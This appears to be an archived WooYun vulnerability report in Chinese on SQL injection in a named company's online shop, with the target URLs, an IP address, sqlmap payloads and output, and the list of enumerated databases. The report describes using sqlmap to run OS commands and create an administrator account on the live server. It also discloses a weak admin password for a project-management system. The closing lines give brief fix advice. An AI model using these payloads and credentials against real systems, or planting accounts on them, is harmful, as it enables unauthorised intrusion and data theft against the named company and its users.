乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开
sql注入
首先发现官网服务器81端口开放web服务,为商城系统
http://www.inke.com.cn:81/Clients/Shops.aspx?Sid=5CCD89751E9B4B968A86ECEFEC244380&state=9
另外一个服务器 B 也是同样的商城系统,也存在注入
http://115.29.220.93:89/Clients/Shops.aspx?sid=5CCD89751E9B4B968A86ECEFEC244380&state=9
神器爆出来的注入信息
ok,放到sqlmap里看看
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:---Parameter: state (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9';WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(90)+CHAR(69)+CHAR(109)+CHAR(68)+CHAR(66)+CHAR(117)+CHAR(74)+CHAR(106)+CHAR(121)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: state (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9';WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(90)+CHAR(69)+CHAR(109)+CHAR(68)+CHAR(66)+CHAR(117)+CHAR(74)+CHAR(106)+CHAR(121)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [21]:[*] AD_ORDER[*] Inju_O2O[*] Inke[*] inkeserver30[*] InkeTest[*] mana[*] master[*] model[*] msdb[*] newInke[*] oldInke[*] ReportServer[*] ReportServerTempDB[*] SFOAV5[*] sqbliugp[*] tempdb[*] Ykxt2015-2[*] Ykxt2015-SC[*] Ykxt2015Dev2[*] Ykxt2015Dev_new[*] Ykxt2015ff
得到服务器是win2008,通过sqlmap执行--os-cmd 建立服务器管理员用户 test/P@ssW0rd!然后就登上去服务器了
服务器里有源码和数据库信息
同时,服务器上的84端口还开放84端口,使用禅道系统,弱口令admin/123456 。。。。里面有公司项目开发的各种信息
修复注入禅道系统弱口令把服务器上的test用户删掉
未能联系到厂商或者厂商积极拒绝